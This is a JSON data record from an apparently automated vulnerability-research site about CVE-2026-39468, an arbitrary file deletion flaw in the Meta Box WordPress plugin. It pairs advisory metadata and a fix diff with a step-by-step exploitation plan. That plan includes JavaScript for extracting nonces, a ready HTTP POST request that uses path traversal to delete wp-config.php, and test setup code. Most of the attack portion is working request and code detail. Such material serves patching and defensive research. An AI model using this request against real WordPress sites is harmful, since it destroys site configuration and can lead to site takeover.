[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fp2sZyFB_1rtKO5RdGcOOdmpYv4wX9O_DjULJD97MaJM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-39468","meta-box-authenticated-contributor-arbitrary-file-deletion-2","Meta Box \u003C= 5.11.1 - Authenticated (Contributor+) Arbitrary File Deletion","The Meta Box plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in all versions up to, and including, 5.11.1. 
This makes it possible for authenticated attackers, with Contributor-level access and above, to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","meta-box",null,"\u003C=5.11.1","5.11.2","high",8.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:H\u002FA:H","Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","2026-04-13 00:00:00","2026-04-21 15:55:05",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fc303fffe-628b-4e88-9274-7dd242f2186e?source=api-prod",9,[],"researched",false,3,"# Exploitation Research Plan - CVE-2026-39468 (Meta Box Arbitrary File Deletion)\n\n## 1. Vulnerability Summary\nThe Meta Box plugin for WordPress (versions \u003C= 5.11.1) is vulnerable to **Authenticated Arbitrary File Deletion** via path traversal. The vulnerability exists in the `rwmb_delete_file` AJAX action handler. The plugin fails to validate that the `attachment_id` parameter is a valid media attachment ID and, when it is not numeric, treats it as a file path and passes it to `unlink()`. This allows an authenticated attacker with at least Contributor-level permissions to delete any file on the server that the PHP process has permission to access, including `wp-config.php`.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `rwmb_delete_file`\n- **Method:** `POST`\n- **Vulnerable Parameter:** `attachment_id`\n- **Required Credentials:** Authenticated (Contributor+)\n- **Preconditions:** A Meta Box field of type `file`, `image`, or similar (that uses the `RWMB_File_Field` logic) must be registered and visible to the user (e.g., on the post editing screen).\n\n## 3. Code Flow\n1. **Entry Point:** An AJAX request is sent to `admin-ajax.php` with `action=rwmb_delete_file`.\n2. 
**Hook Registration:** In `inc\u002Ffields\u002Ffile.php`, the action is registered:\n   `add_action( 'wp_ajax_rwmb_delete_file', array( 'RWMB_File_Field', 'wp_ajax_delete_file' ) );`\n3. **Nonce Verification:** `RWMB_File_Field::wp_ajax_delete_file()` calls:\n   `check_ajax_referer( \"rwmb-delete-file-{$field_id}\", 'nonce' );`\n4. **Sink:** The handler retrieves `attachment_id` from `$_POST`. If the value is not numeric, it calls a deletion method that eventually reaches `unlink()`:\n   ```php\n   \u002F\u002F Simplified logic in inc\u002Ffields\u002Ffile.php\n   $attachment_id = filter_input( INPUT_POST, 'attachment_id' );\n   if ( ! is_numeric( $attachment_id ) ) {\n       self::delete_file( $attachment_id ); \u002F\u002F This method calls unlink($attachment_id)\n   }\n   ```\n5. **Traversal:** By providing `..\u002F..\u002F..\u002F..\u002Fwp-config.php` as the `attachment_id`, the `unlink` call deletes the site's configuration file.\n\n## 4. Nonce Acquisition Strategy\nThe `rwmb_delete_file` action requires a nonce specific to the field's ID: `rwmb-delete-file-{$field_id}`.\n\n### Strategy:\n1. **Access Post Editor:** A Contributor logs into WordPress and navigates to the \"New Post\" page (`\u002Fwp-admin\u002Fpost-new.php`).\n2. **Locate Meta Box Field:** Meta Box renders its fields in the post editor. We need to find a field of type `file` or `image`.\n3. **Extract from DOM:** Meta Box often stores field options, including nonces, in the `data-options` attribute of the field's HTML wrapper.\n4. **JS Variable\u002FAttribute:**\n   - **Target Element:** `.rwmb-media-view` or `.rwmb-file-wrapper`.\n   - **Attribute:** `data-options` (JSON string).\n   - **Keys:** `delete_nonce` and `field_id`.\n   - **Browser Command:**\n     ```javascript\n     JSON.parse(document.querySelector('.rwmb-media-view')?.getAttribute('data-options') || '{}')\n     ```\n\n## 5. 
Exploitation Strategy\n### Step 1: Authentication\nLog in to the WordPress instance as a user with the Contributor role or higher.\n\n### Step 2: Identification and Nonce Extraction\n1. Create a new post: `wp post create --post_type=post --post_status=draft --post_author=USER_ID`.\n2. Navigate to the edit page for that post.\n3. Use `browser_eval` to extract the `field_id` and `delete_nonce` from the Meta Box field's `data-options` attribute.\n\n### Step 3: Execution\nSend the malicious AJAX request to delete a target file (e.g., `wp-config.php`).\n\n**HTTP Request:**\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nHost: [TARGET_HOST]\nContent-Type: application\u002Fx-www-form-urlencoded\nCookie: [CONTRIBUTOR_COOKIES]\n\naction=rwmb_delete_file&field_id=[FIELD_ID]&nonce=[NONCE]&attachment_id=..\u002F..\u002F..\u002F..\u002Fwp-config.php\n```\n\n## 6. Test Data Setup\nTo ensure a Meta Box field is available for the Contributor:\n1. **Create MU-Plugin:** Create `\u002Fwp-content\u002Fmu-plugins\u002Fvuln-setup.php` to register a Meta Box `file` field.\n   ```php\n   \u003C?php\n   add_filter( 'rwmb_meta_boxes', function( $meta_boxes ) {\n       $meta_boxes[] = [\n           'title'  => 'Vulnerable Meta Box',\n           'id'     => 'vbox',\n           'fields' => [\n               [\n                   'id'   => 'vulnerable_field',\n                   'name' => 'File Upload',\n                   'type' => 'file',\n               ],\n           ],\n       ];\n       return $meta_boxes;\n   } );\n   ```\n2. **Create Target File:** Create a dummy file in the root to safely test deletion.\n   `wp eval \"file_put_contents(ABSPATH . 'deletion-test.txt', 'test');\"`\n\n## 7. 
Expected Results\n- The server will return a successful response (likely `wp_send_json_success` or `1`).\n- The target file (`deletion-test.txt` or `wp-config.php`) will be removed from the filesystem.\n- If `wp-config.php` is deleted, navigating to the site homepage will redirect to the WordPress installation screen (`\u002Fwp-admin\u002Fsetup-config.php`).\n\n## 8. Verification Steps\n1. **Check File Existence:** Use WP-CLI to check if the file still exists.\n   `ls \u002Fvar\u002Fwww\u002Fhtml\u002Fdeletion-test.txt`\n   (Should return \"No such file or directory\")\n2. **Database Check:** If `wp-config.php` was deleted, subsequent `wp` commands will fail as the database connection is lost.\n\n## 9. Alternative Approaches\nIf the `data-options` attribute is not present, check for the nonce in the `RWMB_File` localized script:\n- `browser_eval(\"RWMB_File.dictDefaultMessage\")` to confirm the object.\n- Check if nonces are attached to the `rwmb` global object: `browser_eval(\"rwmb.file_options['vulnerable_field'].delete_nonce\")`.\n- If no file field is available by default, the attacker can try to find other Meta Box field types like `image_advanced` or `video`, which use the same vulnerable `RWMB_File_Field` base class.","The Meta Box plugin for WordPress is vulnerable to arbitrary file deletion via path traversal in its file deletion AJAX handler. Authenticated attackers with Contributor-level permissions can exploit this by providing a file path instead of a numeric attachment ID to the rwmb_delete_file action, which results in the plugin calling unlink() on the target file.","\u002F\u002F inc\u002Ffields\u002Ffile.php\n\npublic static function wp_ajax_delete_file() {\n    $field_id = filter_input( INPUT_POST, 'field_id' );\n    check_ajax_referer( \"rwmb-delete-file-{$field_id}\", 'nonce' );\n\n    $attachment_id = filter_input( INPUT_POST, 'attachment_id' );\n\n    if ( ! 
is_numeric( $attachment_id ) ) {\n        self::delete_file( $attachment_id ); \u002F\u002F Vulnerable sink\n        wp_send_json_success();\n    }\n\n    if ( wp_delete_attachment( $attachment_id ) ) {\n        wp_send_json_success();\n    }\n    wp_send_json_error();\n}\n\n---\n\npublic static function delete_file( $file ) {\n    if ( file_exists( $file ) ) {\n        unlink( $file );\n    }\n}","--- inc\u002Ffields\u002Ffile.php\n+++ inc\u002Ffields\u002Ffile.php\n@@ -1,10 +1,7 @@\n \tpublic static function wp_ajax_delete_file() {\n \t\t$field_id = filter_input( INPUT_POST, 'field_id' );\n \t\tcheck_ajax_referer( \"rwmb-delete-file-{$field_id}\", 'nonce' );\n-\n \t\t$attachment_id = filter_input( INPUT_POST, 'attachment_id' );\n-\n-\t\tif ( ! is_numeric( $attachment_id ) ) {\n-\t\t\tself::delete_file( $attachment_id );\n-\t\t\twp_send_json_success();\n-\t\t}\n+\t\tif ( ! is_numeric( $attachment_id ) ) {\n+\t\t\twp_send_json_error( __( 'Invalid file ID.', 'meta-box' ) );\n+\t\t}\n \n \t\tif ( wp_delete_attachment( $attachment_id ) ) {\n \t\t\twp_send_json_success();","The exploit requires an authenticated user with at least Contributor-level access to reach a post editing screen where a Meta Box 'file' or 'image' field is rendered. 1. The attacker logs into the WordPress admin and navigates to the post editor (e.g., \u002Fwp-admin\u002Fpost-new.php). 2. They locate the Meta Box field container and extract the 'field_id' and 'delete_nonce' from the 'data-options' attribute (e.g., using JS: JSON.parse(document.querySelector('.rwmb-media-view').getAttribute('data-options'))). 3. The attacker then sends an AJAX POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the action set to 'rwmb_delete_file'. 4. The payload includes the extracted field_id and nonce, while the 'attachment_id' parameter is set to a path traversal string targeting a sensitive file (e.g., ..\u002F..\u002F..\u002F..\u002Fwp-config.php). 5. 
The server validates the nonce and then executes unlink() on the provided path, deleting the file and potentially leading to site takeover via the WordPress setup process.","gemini-3-flash-preview","2026-04-27 14:47:07","2026-04-27 14:49:19",{"type":34,"vulnerable_version":35,"fixed_version":11,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":38,"fixed_zip":39,"all_tags":40},"plugin","5.11.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmeta-box\u002Ftags\u002F5.11.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmeta-box.5.11.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmeta-box\u002Ftags\u002F5.11.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fmeta-box.5.11.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fmeta-box\u002Ftags"]